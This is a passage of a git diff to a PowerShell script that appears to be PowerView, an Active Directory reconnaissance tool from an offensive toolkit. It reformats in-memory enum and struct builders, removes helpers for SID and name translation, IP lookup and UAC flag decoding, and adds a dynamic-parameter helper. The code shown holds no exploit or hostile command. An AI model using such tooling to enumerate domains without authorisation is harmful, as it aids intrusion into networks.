Specifies that the enum should be treated as a bitfield. +.PARAMETER Bitfield - .EXAMPLE +Specifies that the enum should be treated as a bitfield. - $Mod = New-InMemoryModule -ModuleName Win32 +.EXAMPLE - $ImageSubsystem = psenum $Mod PE.IMAGE_SUBSYSTEM UInt16 @{ - UNKNOWN = 0 - NATIVE = 1 # Image doesn't require a subsystem. - WINDOWS_GUI = 2 # Image runs in the Windows GUI subsystem. - WINDOWS_CUI = 3 # Image runs in the Windows character subsystem. - OS2_CUI = 5 # Image runs in the OS/2 character subsystem. - POSIX_CUI = 7 # Image runs in the Posix character subsystem. - NATIVE_WINDOWS = 8 # Image is a native Win9x driver. - WINDOWS_CE_GUI = 9 # Image runs in the Windows CE subsystem. - EFI_APPLICATION = 10 - EFI_BOOT_SERVICE_DRIVER = 11 - EFI_RUNTIME_DRIVER = 12 - EFI_ROM = 13 - XBOX = 14 - WINDOWS_BOOT_APPLICATION = 16 - } +$Mod = New-InMemoryModule -ModuleName Win32 + +$ImageSubsystem = psenum $Mod PE.IMAGE_SUBSYSTEM UInt16 @{ + UNKNOWN = 0 + NATIVE = 1 # Image doesn't require a subsystem. + WINDOWS_GUI = 2 # Image runs in the Windows GUI subsystem. + WINDOWS_CUI = 3 # Image runs in the Windows character subsystem. + OS2_CUI = 5 # Image runs in the OS/2 character subsystem. + POSIX_CUI = 7 # Image runs in the Posix character subsystem. + NATIVE_WINDOWS = 8 # Image is a native Win9x driver. + WINDOWS_CE_GUI = 9 # Image runs in the Windows CE subsystem. + EFI_APPLICATION = 10 + EFI_BOOT_SERVICE_DRIVER = 11 + EFI_RUNTIME_DRIVER = 12 + EFI_ROM = 13 + XBOX = 14 + WINDOWS_BOOT_APPLICATION = 16 +} - .NOTES +.NOTES - PowerShell purists may disagree with the naming of this function but - again, this was developed in such a way so as to emulate a "C style" - definition as closely as possible. Sorry, I'm not going to name it - New-Enum. :P +PowerShell purists may disagree with the naming of this function but +again, this was developed in such a way so as to emulate a "C style" +definition as closely as possible. Sorry, I'm not going to name it +New-Enum. :P #> [OutputType([Type])] - Param - ( - [Parameter(Position = 0, Mandatory = $True)] + Param ( + [Parameter(Position = 0, Mandatory=$True)] [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})] $Module, - [Parameter(Position = 1, Mandatory = $True)] + [Parameter(Position = 1, Mandatory=$True)] [ValidateNotNullOrEmpty()] [String] $FullName, - [Parameter(Position = 2, Mandatory = $True)] + [Parameter(Position = 2, Mandatory=$True)] [Type] $Type, - [Parameter(Position = 3, Mandatory = $True)] + [Parameter(Position = 3, Mandatory=$True)] [ValidateNotNullOrEmpty()] [Hashtable] $EnumElements, @@ -446,10 +466,10 @@ function psenum $EnumBuilder.SetCustomAttribute($FlagsCustomAttribute) } - ForEach ($Key in $EnumElements.Keys) + foreach ($Key in $EnumElements.Keys) { # Apply the specified enum type to each element - $Null = $EnumBuilder.DefineLiteral($Key, $EnumElements[$Key] -as $EnumType) + $null = $EnumBuilder.DefineLiteral($Key, $EnumElements[$Key] -as $EnumType) } $EnumBuilder.CreateType() @@ -458,15 +478,13 @@ function psenum # A helper function used to reduce typing while defining struct # fields. -function field -{ - Param - ( - [Parameter(Position = 0, Mandatory = $True)] +function field { + Param ( + [Parameter(Position = 0, Mandatory=$True)] [UInt16] $Position, - [Parameter(Position = 1, Mandatory = $True)] + [Parameter(Position = 1, Mandatory=$True)] [Type] $Type, @@ -490,111 +508,110 @@ function field function struct { <# - .SYNOPSIS +.SYNOPSIS - Creates an in-memory struct for use in your PowerShell session. +Creates an in-memory struct for use in your PowerShell session. - Author: Matthew Graeber (@mattifestation) - License: BSD 3-Clause - Required Dependencies: None - Optional Dependencies: field +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: field - .DESCRIPTION +.DESCRIPTION - The 'struct' function facilitates the creation of structs entirely in - memory using as close to a "C style" as PowerShell will allow. Struct - fields are specified using a hashtable where each field of the struct - is comprosed of the order in which it should be defined, its .NET - type, and optionally, its offset and special marshaling attributes. +The 'struct' function facilitates the creation of structs entirely in +memory using as close to a "C style" as PowerShell will allow. Struct +fields are specified using a hashtable where each field of the struct +is comprosed of the order in which it should be defined, its .NET +type, and optionally, its offset and special marshaling attributes. - One of the features of 'struct' is that after your struct is defined, - it will come with a built-in GetSize method as well as an explicit - converter so that you can easily cast an IntPtr to the struct without - relying upon calling SizeOf and/or PtrToStructure in the Marshal - class. +One of the features of 'struct' is that after your struct is defined, +it will come with a built-in GetSize method as well as an explicit +converter so that you can easily cast an IntPtr to the struct without +relying upon calling SizeOf and/or PtrToStructure in the Marshal +class. - .PARAMETER Module +.PARAMETER Module - The in-memory module that will host the struct. Use - New-InMemoryModule to define an in-memory module. +The in-memory module that will host the struct. Use +New-InMemoryModule to define an in-memory module. - .PARAMETER FullName +.PARAMETER FullName - The fully-qualified name of the struct. +The fully-qualified name of the struct. - .PARAMETER StructFields +.PARAMETER StructFields - A hashtable of fields. Use the 'field' helper function to ease - defining each field. +A hashtable of fields. Use the 'field' helper function to ease +defining each field. - .PARAMETER PackingSize +.PARAMETER PackingSize - Specifies the memory alignment of fields. +Specifies the memory alignment of fields. - .PARAMETER ExplicitLayout +.PARAMETER ExplicitLayout - Indicates that an explicit offset for each field will be specified. +Indicates that an explicit offset for each field will be specified. - .EXAMPLE +.EXAMPLE - $Mod = New-InMemoryModule -ModuleName Win32 +$Mod = New-InMemoryModule -ModuleName Win32 - $ImageDosSignature = psenum $Mod PE.IMAGE_DOS_SIGNATURE UInt16 @{ - DOS_SIGNATURE = 0x5A4D - OS2_SIGNATURE = 0x454E - OS2_SIGNATURE_LE = 0x454C - VXD_SIGNATURE = 0x454C - } +$ImageDosSignature = psenum $Mod PE.IMAGE_DOS_SIGNATURE UInt16 @{ + DOS_SIGNATURE = 0x5A4D + OS2_SIGNATURE = 0x454E + OS2_SIGNATURE_LE = 0x454C + VXD_SIGNATURE = 0x454C +} - $ImageDosHeader = struct $Mod PE.IMAGE_DOS_HEADER @{ - e_magic = field 0 $ImageDosSignature - e_cblp = field 1 UInt16 - e_cp = field 2 UInt16 - e_crlc = field 3 UInt16 - e_cparhdr = field 4 UInt16 - e_minalloc = field 5 UInt16 - e_maxalloc = field 6 UInt16 - e_ss = field 7 UInt16 - e_sp = field 8 UInt16 - e_csum = field 9 UInt16 - e_ip = field 10 UInt16 - e_cs = field 11 UInt16 - e_lfarlc = field 12 UInt16 - e_ovno = field 13 UInt16 - e_res = field 14 UInt16[] -MarshalAs @('ByValArray', 4) - e_oemid = field 15 UInt16 - e_oeminfo = field 16 UInt16 - e_res2 = field 17 UInt16[] -MarshalAs @('ByValArray', 10) - e_lfanew = field 18 Int32 - } +$ImageDosHeader = struct $Mod PE.IMAGE_DOS_HEADER @{ + e_magic = field 0 $ImageDosSignature + e_cblp = field 1 UInt16 + e_cp = field 2 UInt16 + e_crlc = field 3 UInt16 + e_cparhdr = field 4 UInt16 + e_minalloc = field 5 UInt16 + e_maxalloc = field 6 UInt16 + e_ss = field 7 UInt16 + e_sp = field 8 UInt16 + e_csum = field 9 UInt16 + e_ip = field 10 UInt16 + e_cs = field 11 UInt16 + e_lfarlc = field 12 UInt16 + e_ovno = field 13 UInt16 + e_res = field 14 UInt16[] -MarshalAs @('ByValArray', 4) + e_oemid = field 15 UInt16 + e_oeminfo = field 16 UInt16 + e_res2 = field 17 UInt16[] -MarshalAs @('ByValArray', 10) + e_lfanew = field 18 Int32 +} - # Example of using an explicit layout in order to create a union. - $TestUnion = struct $Mod TestUnion @{ - field1 = field 0 UInt32 0 - field2 = field 1 IntPtr 0 - } -ExplicitLayout +# Example of using an explicit layout in order to create a union. +$TestUnion = struct $Mod TestUnion @{ + field1 = field 0 UInt32 0 + field2 = field 1 IntPtr 0 +} -ExplicitLayout - .NOTES +.NOTES - PowerShell purists may disagree with the naming of this function but - again, this was developed in such a way so as to emulate a "C style" - definition as closely as possible. Sorry, I'm not going to name it - New-Struct. :P +PowerShell purists may disagree with the naming of this function but +again, this was developed in such a way so as to emulate a "C style" +definition as closely as possible. Sorry, I'm not going to name it +New-Struct. :P #> [OutputType([Type])] - Param - ( - [Parameter(Position = 1, Mandatory = $True)] + Param ( + [Parameter(Position = 1, Mandatory=$True)] [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})] $Module, - [Parameter(Position = 2, Mandatory = $True)] + [Parameter(Position = 2, Mandatory=$True)] [ValidateNotNullOrEmpty()] [String] $FullName, - [Parameter(Position = 3, Mandatory = $True)] + [Parameter(Position = 3, Mandatory=$True)] [ValidateNotNullOrEmpty()] [Hashtable] $StructFields, @@ -635,13 +652,13 @@ function struct # Sort each field according to the orders specified # Unfortunately, PSv2 doesn't have the luxury of the # hashtable [Ordered] accelerator. - ForEach ($Field in $StructFields.Keys) + foreach ($Field in $StructFields.Keys) { $Index = $StructFields[$Field]['Position'] $Fields[$Index] = @{FieldName = $Field; Properties = $StructFields[$Field]} } - ForEach ($Field in $Fields) + foreach ($Field in $Fields) { $FieldName = $Field['FieldName'] $FieldProp = $Field['Properties'] @@ -714,7032 +731,13762 @@ function struct # ######################################################## -filter Get-IniContent { +Function New-DynamicParameter { <# - .SYNOPSIS - - This helper parses an .ini file into a proper PowerShell object. - - Author: 'The Scripting Guys' - Link: https://blogs.technet.microsoft.com/heyscriptingguy/2011/08/20/use-powershell-to-work-with-any-ini-file/ +.SYNOPSIS - .LINK +Helper function to simplify creating dynamic parameters. - https://blogs.technet.microsoft.com/heyscriptingguy/2011/08/20/use-powershell-to-work-with-any-ini-file/ -#> - [CmdletBinding()] - Param( - [Parameter(Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)] - [Alias('FullName')] - [ValidateScript({ Test-Path -Path $_ })] - [String[]] - $Path - ) + Adapated from https://beatcracker.wordpress.com/2015/08/10/dynamic-parameters-validateset-and-enums/. + Originally released under the Microsoft Public License (Ms-PL). - ForEach($TargetPath in $Path) { - $IniObject = @{} - Switch -Regex -File $TargetPath { - "^\[(.+)\]" # Section - { - $Section = $matches[1].Trim() - $IniObject[$Section] = @{} - $CommentCount = 0 - } - "^(;.*)$" # Comment - { - $Value = $matches[1].Trim() - $CommentCount = $CommentCount + 1 - $Name = 'Comment' + $CommentCount - $IniObject[$Section][$Name] = $Value - } - "(.+?)\s*=(.*)" # Key - { - $Name, $Value = $matches[1..2] - $Name = $Name.Trim() - $Values = $Value.split(',') | ForEach-Object {$_.Trim()} - if($Values -isnot [System.Array]) {$Values = @($Values)} - $IniObject[$Section][$Name] = $Values - } - } - $IniObject - } -} +.DESCRIPTION -filter Export-PowerViewCSV { -<# - .SYNOPSIS +Helper function to simplify creating dynamic parameters. - This helper exports an -InputObject to a .csv in a thread-safe manner - using a mutex. This is so the various multi-threaded functions in - PowerView has a thread-safe way to export output to the same file. - - Based partially on Dmitry Sotnikov's Export-CSV code - at http://poshcode.org/1590 +Example use cases: + Include parameters only if your environment dictates it + Include parameters depending on the value of a user-specified parameter + Provide tab completion and intellisense for parameters, depending on the environment - .LINK +Please keep in mind that all dynamic parameters you create, will not have corresponding variables created. + Use New-DynamicParameter with 'CreateVariables' switch in your main code block, + ('Process' for advanced functions) to create those variables. + Alternatively, manually reference $PSBoundParameters for the dynamic parameter value. - http://poshcode.org/1590 - http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/ -#> - Param( - [Parameter(Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)] - [System.Management.Automation.PSObject[]] - $InputObject, +This function has two operating modes: - [Parameter(Mandatory=$True, Position=0)] - [String] - [ValidateNotNullOrEmpty()] - $OutFile - ) +1. All dynamic parameters created in one pass using pipeline input to the function. This mode allows to create dynamic parameters en masse, +with one function call. There is no need to create and maintain custom RuntimeDefinedParameterDictionary. - $ObjectCSV = $InputObject | ConvertTo-Csv -NoTypeInformation +2. Dynamic parameters are created by separate function calls and added to the RuntimeDefinedParameterDictionary you created beforehand. +Then you output this RuntimeDefinedParameterDictionary to the pipeline. This allows more fine-grained control of the dynamic parameters, +with custom conditions and so on. - # mutex so threaded code doesn't stomp on the output file - $Mutex = New-Object System.Threading.Mutex $False,'CSVMutex'; - $Null = $Mutex.WaitOne() +.NOTES - if (Test-Path -Path $OutFile) { - # hack to skip the first line of output if the file already exists - $ObjectCSV | ForEach-Object { $Start=$True }{ if ($Start) {$Start=$False} else {$_} } | Out-File -Encoding 'ASCII' -Append -FilePath $OutFile - } - else { - $ObjectCSV | Out-File -Encoding 'ASCII' -Append -FilePath $OutFile - } +Credits to jrich523 and ramblingcookiemonster for their initial code and inspiration: + https://github.com/RamblingCookieMonster/PowerShell/blob/master/New-DynamicParam.ps1 + http://ramblingcookiemonster.wordpress.com/2014/11/27/quick-hits-credentials-and-dynamic-parameters/ + http://jrich523.wordpress.com/2013/05/30/powershell-simple-way-to-add-dynamic-parameters-to-advanced-function/ - $Mutex.ReleaseMutex() -} +Credit to BM for alias and type parameters and their handling +.PARAMETER Name -filter Get-IPAddress { -<# - .SYNOPSIS +Name of the dynamic parameter - Resolves a given hostename to its associated IPv4 address. - If no hostname is provided, it defaults to returning - the IP address of the localhost. +.PARAMETER Type - .EXAMPLE +Type for the dynamic parameter. Default is string - PS C:\> Get-IPAddress -ComputerName SERVER - - Return the IPv4 address of 'SERVER' +.PARAMETER Alias - .EXAMPLE +If specified, one or more aliases to assign to the dynamic parameter - PS C:\> Get-Content .\hostnames.txt | Get-IPAddress +.PARAMETER Mandatory - Get the IP addresses of all hostnames in an input file. -#> +If specified, set the Mandatory attribute for this dynamic parameter - [CmdletBinding()] - param( - [Parameter(Position=0, ValueFromPipeline=$True)] - [Alias('HostName')] - [String] - $ComputerName = $Env:ComputerName - ) +.PARAMETER Position - try { - # extract the computer name from whatever object was passed on the pipeline - $Computer = $ComputerName | Get-NameField +If specified, set the Position attribute for this dynamic parameter - # get the IP resolution of this specified hostname - @(([Net.Dns]::GetHostEntry($Computer)).AddressList) | ForEach-Object { - if ($_.AddressFamily -eq 'InterNetwork') { - $Out = New-Object PSObject - $Out | Add-Member Noteproperty 'ComputerName' $Computer - $Out | Add-Member Noteproperty 'IPAddress' $_.IPAddressToString - $Out - } - } - } - catch { - Write-Verbose -Message 'Could not resolve host to an IP Address.' - } -} +.PARAMETER HelpMessage +If specified, set the HelpMessage for this dynamic parameter -filter Convert-NameToSid { -<# - .SYNOPSIS +.PARAMETER DontShow - Converts a given user/group name to a security identifier (SID). +If specified, set the DontShow for this dynamic parameter. +This is the new PowerShell 4.0 attribute that hides parameter from tab-completion. +http://www.powershellmagazine.com/2013/07/29/pstip-hiding-parameters-from-tab-completion/ - .PARAMETER ObjectName +.PARAMETER ValueFromPipeline - The user/group name to convert, can be 'user' or 'DOMAIN\user' format. +If specified, set the ValueFromPipeline attribute for this dynamic parameter - .PARAMETER Domain +.PARAMETER ValueFromPipelineByPropertyName - Specific domain for the given user account, defaults to the current domain. +If specified, set the ValueFromPipelineByPropertyName attribute for this dynamic parameter - .EXAMPLE +.PARAMETER ValueFromRemainingArguments - PS C:\> Convert-NameToSid 'DEV\dfm' -#> - [CmdletBinding()] - param( - [Parameter(Mandatory=$True, ValueFromPipeline=$True)] - [String] - [Alias('Name')] - $ObjectName, +If specified, set the ValueFromRemainingArguments attribute for this dynamic parameter - [String] - $Domain - ) +.PARAMETER ParameterSetName - $ObjectName = $ObjectName -Replace "/","\" - - if($ObjectName.Contains("\")) { - # if we get a DOMAIN\user format, auto convert it - $Domain = $ObjectName.Split("\")[0] - $ObjectName = $ObjectName.Split("\")[1] - } - elseif(-not $Domain) { - $Domain = (Get-NetDomain).Name - } +If specified, set the ParameterSet attribute for this dynamic parameter. By default parameter is added to all parameters sets. - try { - $Obj = (New-Object System.Security.Principal.NTAccount($Domain, $ObjectName)) - $SID = $Obj.Translate([System.Security.Principal.SecurityIdentifier]).Value - - $Out = New-Object PSObject - $Out | Add-Member Noteproperty 'ObjectName' $ObjectName - $Out | Add-Member Noteproperty 'SID' $SID - $Out - } - catch { - Write-Verbose "Invalid object/name: $Domain\$ObjectName" - $Null - } -} +.PARAMETER AllowNull +If specified, set the AllowNull attribute of this dynamic parameter -filter Convert-SidToName { -<# - .SYNOPSIS - - Converts a security identifier (SID) to a group/user name. +.PARAMETER AllowEmptyString - .PARAMETER SID - - The SID to convert. +If specified, set the AllowEmptyString attribute of this dynamic parameter - .EXAMPLE +.PARAMETER AllowEmptyCollection - PS C:\> Convert-SidToName S-1-5-21-2620891829-2411261497-1773853088-1105 -#> - [CmdletBinding()] - param( - [Parameter(Mandatory=$True, ValueFromPipeline=$True)] - [String] - [ValidatePattern('^S-1-.*')] - $SID - ) +If specified, set the AllowEmptyCollection attribute of this dynamic parameter - try { - $SID2 = $SID.trim('*') - - # try to resolve any built-in SIDs first - # from https://support.microsoft.com/en-us/kb/243330 - Switch ($SID2) { - 'S-1-0' { 'Null Authority' } - 'S-1-0-0' { 'Nobody' } - 'S-1-1' { 'World Authority' } - 'S-1-1-0' { 'Everyone' } - 'S-1-2' { 'Local Authority' } - 'S-1-2-0' { 'Local' } - 'S-1-2-1' { 'Console Logon ' } - 'S-1-3' { 'Creator Authority' } - 'S-1-3-0' { 'Creator Owner' } - 'S-1-3-1' { 'Creator Group' } - 'S-1-3-2' { 'Creator Owner Server' } - 'S-1-3-3' { 'Creator Group Server' } - 'S-1-3-4' { 'Owner Rights' } - 'S-1-4' { 'Non-unique Authority' } - 'S-1-5' { 'NT Authority' } - 'S-1-5-1' { 'Dialup' } - 'S-1-5-2' { 'Network' } - 'S-1-5-3' { 'Batch' } - 'S-1-5-4' { 'Interactive' } - 'S-1-5-6' { 'Service' } - 'S-1-5-7' { 'Anonymous' } - 'S-1-5-8' { 'Proxy' } - 'S-1-5-9' { 'Enterprise Domain Controllers' } - 'S-1-5-10' { 'Principal Self' } - 'S-1-5-11' { 'Authenticated Users' } - 'S-1-5-12' { 'Restricted Code' } - 'S-1-5-13' { 'Terminal Server Users' } - 'S-1-5-14' { 'Remote Interactive Logon' } - 'S-1-5-15' { 'This Organization ' } - 'S-1-5-17' { 'This Organization ' } - 'S-1-5-18' { 'Local System' } - 'S-1-5-19' { 'NT Authority' } - 'S-1-5-20' { 'NT Authority' } - 'S-1-5-80-0' { 'All Services ' } - 'S-1-5-32-544' { 'BUILTIN\Administrators' } - 'S-1-5-32-545' { 'BUILTIN\Users' } - 'S-1-5-32-546' { 'BUILTIN\Guests' } - 'S-1-5-32-547' { 'BUILTIN\Power Users' } - 'S-1-5-32-548' { 'BUILTIN\Account Operators' } - 'S-1-5-32-549' { 'BUILTIN\Server Operators' } - 'S-1-5-32-550' { 'BUILTIN\Print Operators' } - 'S-1-5-32-551' { 'BUILTIN\Backup Operators' } - 'S-1-5-32-552' { 'BUILTIN\Replicators' } - 'S-1-5-32-554' { 'BUILTIN\Pre-Windows 2000 Compatible Access' } - 'S-1-5-32-555' { 'BUILTIN\Remote Desktop Users' } - 'S-1-5-32-556' { 'BUILTIN\Network Configuration Operators' } - 'S-1-5-32-557' { 'BUILTIN\Incoming Forest Trust Builders' } - 'S-1-5-32-558' { 'BUILTIN\Performance Monitor Users' } - 'S-1-5-32-559' { 'BUILTIN\Performance Log Users' } - 'S-1-5-32-560' { 'BUILTIN\Windows Authorization Access Group' } - 'S-1-5-32-561' { 'BUILTIN\Terminal Server License Servers' } - 'S-1-5-32-562' { 'BUILTIN\Distributed COM Users' } - 'S-1-5-32-569' { 'BUILTIN\Cryptographic Operators' } - 'S-1-5-32-573' { 'BUILTIN\Event Log Readers' } - 'S-1-5-32-574' { 'BUILTIN\Certificate Service DCOM Access' } - 'S-1-5-32-575' { 'BUILTIN\RDS Remote Access Servers' } - 'S-1-5-32-576' { 'BUILTIN\RDS Endpoint Servers' } - 'S-1-5-32-577' { 'BUILTIN\RDS Management Servers' } - 'S-1-5-32-578' { 'BUILTIN\Hyper-V Administrators' } - 'S-1-5-32-579' { 'BUILTIN\Access Control Assistance Operators' } - 'S-1-5-32-580' { 'BUILTIN\Access Control Assistance Operators' } - Default { - $Obj = (New-Object System.Security.Principal.SecurityIdentifier($SID2)) - $Obj.Translate( [System.Security.Principal.NTAccount]).Value - } - } - } - catch { - Write-Verbose "Invalid SID: $SID" - $SID - } -} +.PARAMETER ValidateNotNull +If specified, set the ValidateNotNull attribute of this dynamic parameter -filter Convert-ADName { -<# - .SYNOPSIS +.PARAMETER ValidateNotNullOrEmpty - Converts user/group names from NT4 (DOMAIN\user) or domainSimple (user@domain.com) - to canonical format (domain.com/Users/user) or NT4. +If specified, set the ValidateNotNullOrEmpty attribute of this dynamic parameter - Based on Bill Stewart's code from this article: - http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats +.PARAMETER ValidateRange - .PARAMETER ObjectName +If specified, set the ValidateRange attribute of this dynamic parameter - The user/group name to convert. +.PARAMETER ValidateLength - .PARAMETER InputType +If specified, set the ValidateLength attribute of this dynamic parameter - The InputType of the user/group name ("NT4","Simple","Canonical"). +.PARAMETER ValidatePattern - .PARAMETER OutputType +If specified, set the ValidatePattern attribute of this dynamic parameter - The OutputType of the user/group name ("NT4","Simple","Canonical"). +.PARAMETER ValidateScript - .EXAMPLE +If specified, set the ValidateScript attribute of this dynamic parameter - PS C:\> Convert-ADName -ObjectName "dev\dfm" - - Returns "dev.testlab.local/Users/Dave" +.PARAMETER ValidateSet - .EXAMPLE +If specified, set the ValidateSet attribute of this dynamic parameter - PS C:\> Convert-SidToName "S-..." | Convert-ADName - - Returns the canonical name for the resolved SID. +.PARAMETER Dictionary - .LINK +If specified, add resulting RuntimeDefinedParameter to an existing RuntimeDefinedParameterDictionary. +Appropriate for custom dynamic parameters creation. - http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats +If not specified, create and return a RuntimeDefinedParameterDictionary +Appropriate for a simple dynamic parameter creation. #> - [CmdletBinding()] - param( - [Parameter(Mandatory=$True, ValueFromPipeline=$True)] - [String] - $ObjectName, - [String] - [ValidateSet("NT4","Simple","Canonical")] - $InputType, - - [String] - [ValidateSet("NT4","Simple","Canonical")] - $OutputType - ) - - $NameTypes = @{ - 'Canonical' = 2 - 'NT4' = 3 - 'Simple' = 5 - } - - if(-not $PSBoundParameters['InputType']) { - if( ($ObjectName.split('/')).Count -eq 2 ) { - $ObjectName = $ObjectName.replace('/', '\') - } - - if($ObjectName -match "^[A-Za-z]+\\[A-Za-z ]+") { - $InputType = 'NT4' - } - elseif($ObjectName -match "^[A-Za-z ]+@[A-Za-z\.]+") { - $InputType = 'Simple' - } - elseif($ObjectName -match "^[A-Za-z\.]+/[A-Za-z]+/[A-Za-z/ ]+") { - $InputType = 'Canonical' - } - else { - Write-Warning "Can not identify InType for $ObjectName" - return $ObjectName - } - } - elseif($InputType -eq 'NT4') { - $ObjectName = $ObjectName.replace('/', '\') - } + [CmdletBinding(DefaultParameterSetName = 'DynamicParameter')] + Param ( + [Parameter(Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [ValidateNotNullOrEmpty()] + [string]$Name, - if(-not $PSBoundParameters['OutputType']) { - $OutputType = Switch($InputType) { - 'NT4' {'Canonical'} - 'Simple' {'NT4'} - 'Canonical' {'NT4'} - } - } + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [System.Type]$Type = [int], - # try to extract the domain from the given format - $Domain = Switch($InputType) { - 'NT4' { $ObjectName.split("\")[0] } - 'Simple' { $ObjectName.split("@")[1] } - 'Canonical' { $ObjectName.split("/")[0] } - } + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [string[]]$Alias, - # Accessor functions to simplify calls to NameTranslate - function Invoke-Method([__ComObject] $Object, [String] $Method, $Parameters) { - $Output = $Object.GetType().InvokeMember($Method, "InvokeMethod", $Null, $Object, $Parameters) - if ( $Output ) { $Output } - } - function Set-Property([__ComObject] $Object, [String] $Property, $Parameters) { - [Void] $Object.GetType().InvokeMember($Property, "SetProperty", $Null, $Object, $Parameters) - } + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$Mandatory, - $Translate = New-Object -ComObject NameTranslate + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [int]$Position, - try { - Invoke-Method $Translate "Init" (1, $Domain) - } - catch [System.Management.Automation.MethodInvocationException] { - Write-Verbose "Error with translate init in Convert-ADName: $_" - } + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [string]$HelpMessage, - Set-Property $Translate "ChaseReferral" (0x60) + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$DontShow, - try { - Invoke-Method $Translate "Set" ($NameTypes[$InputType], $ObjectName) - (Invoke-Method $Translate "Get" ($NameTypes[$OutputType])) - } - catch [System.Management.Automation.MethodInvocationException] { - Write-Verbose "Error with translate Set/Get in Convert-ADName: $_" - } -} + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$ValueFromPipeline, + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$ValueFromPipelineByPropertyName, -function ConvertFrom-UACValue { -<# - .SYNOPSIS + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$ValueFromRemainingArguments, - Converts a UAC int value to human readable form. + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [string]$ParameterSetName = '__AllParameterSets', - .PARAMETER Value + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$AllowNull, - The int UAC value to convert. + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$AllowEmptyString, - .PARAMETER ShowAll + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$AllowEmptyCollection, - Show all UAC values, with a + indicating the value is currently set. + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$ValidateNotNull, - .EXAMPLE + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$ValidateNotNullOrEmpty, - PS C:\> ConvertFrom-UACValue -Value 66176 + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [ValidateCount(2,2)] + [int[]]$ValidateCount, - Convert the UAC value 66176 to human readable format. + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [ValidateCount(2,2)] + [int[]]$ValidateRange, - .EXAMPLE + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [ValidateCount(2,2)] + [int[]]$ValidateLength, - PS C:\> Get-NetUser jason | select useraccountcontrol | ConvertFrom-UACValue + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [ValidateNotNullOrEmpty()] + [string]$ValidatePattern, - Convert the UAC value for 'jason' to human readable format. + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [ValidateNotNullOrEmpty()] + [scriptblock]$ValidateScript, - .EXAMPLE + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [ValidateNotNullOrEmpty()] + [string[]]$ValidateSet, - PS C:\> Get-NetUser jason | select useraccountcontrol | ConvertFrom-UACValue -ShowAll + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [ValidateNotNullOrEmpty()] + [ValidateScript({ + if(!($_ -is [System.Management.Automation.RuntimeDefinedParameterDictionary])) + { + Throw 'Dictionary must be a System.Management.Automation.RuntimeDefinedParameterDictionary object' + } + $true + })] + $Dictionary = $false, - Convert the UAC value for 'jason' to human readable format, showing all - possible UAC values. -#> - - [CmdletBinding()] - param( - [Parameter(Mandatory=$True, ValueFromPipeline=$True)] - $Value, + [Parameter(Mandatory = $true, ValueFromPipelineByPropertyName = $true, ParameterSetName = 'CreateVariables')] + [switch]$CreateVariables, - [Switch] - $ShowAll + [Parameter(Mandatory = $true, ValueFromPipelineByPropertyName = $true, ParameterSetName = 'CreateVariables')] + [ValidateNotNullOrEmpty()] + [ValidateScript({ + # System.Management.Automation.PSBoundParametersDictionary is an internal sealed class, + # so one can't use PowerShell's '-is' operator to validate type. + if($_.GetType().Name -notmatch 'Dictionary') { + Throw 'BoundParameters must be a System.Management.Automation.PSBoundParametersDictionary object' + } + $true + })] + $BoundParameters ) - begin { - # values from https://support.microsoft.com/en-us/kb/305144 - $UACValues = New-Object System.Collections.Specialized.OrderedDictionary - $UACValues.Add("SCRIPT", 1) - $UACValues.Add("ACCOUNTDISABLE", 2) - $UACValues.Add("HOMEDIR_REQUIRED", 8) - $UACValues.Add("LOCKOUT", 16) - $UACValues.Add("PASSWD_NOTREQD", 32) - $UACValues.Add("PASSWD_CANT_CHANGE", 64) - $UACValues.Add("ENCRYPTED_TEXT_PWD_ALLOWED", 128) - $UACValues.Add("TEMP_DUPLICATE_ACCOUNT", 256) - $UACValues.Add("NORMAL_ACCOUNT", 512) - $UACValues.Add("INTERDOMAIN_TRUST_ACCOUNT", 2048) - $UACValues.Add("WORKSTATION_TRUST_ACCOUNT", 4096) - $UACValues.Add("SERVER_TRUST_ACCOUNT", 8192) - $UACValues.Add("DONT_EXPIRE_PASSWORD", 65536) - 